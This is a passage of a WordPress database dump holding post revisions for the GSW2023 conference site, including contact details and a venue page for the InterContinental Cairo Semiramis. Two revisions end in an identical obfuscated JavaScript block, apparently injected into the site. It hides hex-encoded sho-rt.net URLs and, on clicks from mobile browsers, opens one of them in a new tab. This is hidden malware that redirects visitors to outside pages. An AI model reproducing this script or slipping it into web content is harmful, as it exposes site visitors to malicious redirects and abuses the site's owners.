tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:41:34','2023-06-13 22:41:34','',3066,'https://gsw2023.com/?p=4692',0,'revision','',0),
(4693,1,'2023-06-13 23:00:52','2023-06-13 23:00:52','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<h5 class=\"clear\"><span style=\"font-family: droid-serif; color: #3366ff;\"><strong><a style=\"color: #3366ff;\"><span style=\"font-size: 12pt;\">GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS</span> </a></strong></span></h5>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo. For more information about the conference venue, please visit the conference web site <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/\">https://gsw2023.com/</a>.</span></strong></li>\n</ul>\n</li>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>Hotels Special Rate Booking is Opened Now Deadline for the Special Rates is August 10, 2023. </strong></li>\n</ul>\n</li>\n</ul>\n</div>\n<p>[/vc_column_text][vc_btn title=\"BOOK NOW\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dhd%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26_PMID%3D99801505%26GPC%3DDY8%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][vc_column_text]<strong>Greetings from InterContinental Cairo Semiramis,</strong></p>\n<p><strong>Kindly use the below group link as requested.</strong></p>\n<p><a href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-06-13 23:00:52','2023-06-13 23:00:52','',2679,'https://gsw2023.com/?p=4693',0,'revision','',0),
(4694,1,'2023-06-13 23:01:12','2023-06-13 23:01:12','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<h5 class=\"clear\"><span style=\"font-family: droid-serif; color: #3366ff;\"><strong><a style=\"color: #3366ff;\"><span style=\"font-size: 12pt;\">GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS</span> </a></strong></span></h5>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo. For more information about the conference venue, please visit the conference web site <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/\">https://gsw2023.com/</a>.</span></strong></li>\n</ul>\n</li>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>Hotels Special Rate Booking is Opened Now Deadline for the Special Rates is August 10, 2023. </strong></li>\n</ul>\n</li>\n</ul>\n</div>\n<p>[/vc_column_text][vc_btn 